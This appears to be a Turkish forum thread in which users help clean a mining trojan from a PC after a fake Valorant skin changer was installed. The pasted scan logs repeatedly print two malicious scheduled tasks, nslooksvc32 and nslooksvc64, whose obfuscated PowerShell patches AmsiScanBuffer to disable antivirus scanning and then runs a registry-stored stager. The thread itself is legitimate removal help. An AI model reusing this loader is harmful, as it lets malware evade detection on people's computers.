$_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: OneDrive Per-Machine Standalone Update Task - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
O22 - Task: OneDrive Reporting Task-S-1-5-21-1593825937-2386105780-1848293327-1005 - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-1058129444-4087973727-844704433-500 - C:\Users\muhan\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: Opera GX scheduled assistant Autoupdate 1620210764 - C:\Users\muhan\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\muhan\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1618946092 - C:\Users\muhan\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: StartCN - C:\Program Files\AMD\CNext\CNext\cncmd.exe startwithdelay
O22 - Task: StartDVR - C:\Program Files\AMD\CNext\CNext\RSServCmd.exe
O23 - Service R2: AMD Crash Defender Service - C:\Windows\System32\amdfendrsr.exe
O23 - Service R2: AMD External Events Utility - C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atiesrxx.exe
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe
O23 - Service R2: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: FileSyncHelper - C:\Program Files\Microsoft OneDrive\22.022.0130.0001\FileSyncHelper.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\96.0.4664.110\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Letasoft Sound Booster Service - (SoundBoosterService) - C:\Program Files (x86)\Letasoft Sound Booster\SoundBoosterService.exe
O23 - Service S3: Mozilla Maintenance Service - (MozillaMaintenance) - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service S3: OneDrive Updater Service - C:\Program Files\Microsoft OneDrive\22.022.0130.0001\OneDriveUpdaterService.exe
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService



Debug information:

- 06.03.2022 21:58:01 - LoadFileToStream - #0 LastDllError = 225 () CreateFile C:\Windows\Tasks\nslooksvc32.job
- 06.03.2022 21:58:01 - ParseJob. Unable to open file: C:\Windows\Tasks\nslooksvc32.job - #0 LastDllError = 0
- 06.03.2022 21:58:01 - LoadFileToStream - #0 LastDllError = 225 () CreateFile C:\Windows\Tasks\nslooksvc64.job
- 06.03.2022 21:58:01 - ParseJob. Unable to open file: C:\Windows\Tasks\nslooksvc64.job - #0 LastDllError = 0

--
End of file - Time spent: 13,7 sec. - 32926 bytes, CRC32: FFFFFFFF. Sign: 䕥趉[/CODE]
 
Bunları fixleyin.

Kod: 
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)

Aktif zararlının silinmiş olması lazım. Kaspersky'i tekrar kurarak test edebilirsiniz. Ayrıyeten aşağıdaki araçla sisteme tam tarama yapmanızı öneririm.

www.emsisoft.com

Emsisoft - Emergency Kit: Free Portable Malware Scan and Removal

Emsisoft Emergency Kit is the ultimate free anti-malware and antivirus tool to scan, detect and remove viruses, keyloggers and other malware threats.
www.emsisoft.com www.emsisoft.com
 
acv dedi:
Bunları fixleyin.

Kod: 
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)

Aktif zararlının silinmiş olması lazım. Kaspersky'i tekrar kurarak test edebilirsiniz. Ayrıyeten aşağıdaki araçla sisteme tam tarama yapmanızı öneririm.

www.emsisoft.com

Emsisoft - Emergency Kit: Free Portable Malware Scan and Removal

Emsisoft Emergency Kit is the ultimate free anti-malware and antivirus tool to scan, detect and remove viruses, keyloggers and other malware threats.
www.emsisoft.com www.emsisoft.com
Genişletmek için tıkla...

Hocam fixleme kısmını anlayamadım onun dışında önerdiğiniz malware sihost64.exe adında bir trojan buldu internetten araştırdım mining virüsü olduğu yazıyordu tek tıkla sildi sıkıntı çıkartmadı. Yardımların için çok teşekkür ederim.
 
AlreadyBroken494 dedi:
Arkadaşlar merhaba, kardeşim dün Valorant skin changer diye saçma bir program yüklemiş 9 yaşında kendisi haberim dışında yapmış, mining virüsü bulaştı bilgisayara bir kısmını silebildim fakat Kaspersky bir virüsü silemedi adı ''MEM:Trojan.Win32.SEPEH.gen" (konum: Sistem belleği) güvenli modda çalıştırıp silmeyi denedim olmadı dosya konumunu aç'a bastım açılmadı kaldırmaya çalışınca ekran gidiyor.
Denediğim uygulamalar;
Kaspersky Anti-Virüs
360 Total Security.
Trojan remover.
Bunların yanında malware bytes deneyecektim fakat kurulumun sonunda yanıt vermiyor ve kapanıyor. (internette birısınma sorunu bununla çözdüğünü yazmış.)
Ayrıca bu virüs başladığından beri Windows+s çalışmıyor Görev Yöneticisi açılışta hata veriyordu ve SSD acayip yavaşladı.

Ayrıca ekran kartı driverimi güncelleyemiyorum. (hata 1603)
Genişletmek için tıkla...

Format en temizidir.
 

Benzer konular

Doom5Days
Trojan Win32 sepeh gen nasıl silinir?
2
Mesaj
12
Görüntüleme
648
Murat5038
Murat5038
isdar
Trojan Win32 Sepeh Gen nasıl silinir?
2
Mesaj
17
Görüntüleme
2.007
Murat5038
Murat5038
xnerT
Trojan Win32 Sepeh Gen hatası nasıl düzeltilir?
Mesaj
1
Görüntüleme
197
Frstghost
Frstghost
Mutlu.p
Win sepeh gen trojan nasıl silinir?
2
Mesaj
11
Görüntüleme
496
334899
3
TürkishGamerr
Trojan vrisü nasıl temizlenebilir?
Mesaj
3
Görüntüleme
306
TürkishGamerr
TürkishGamerr

Technopat Haberler

Yeni konular

Yeni mesajlar

Geri
Yukarı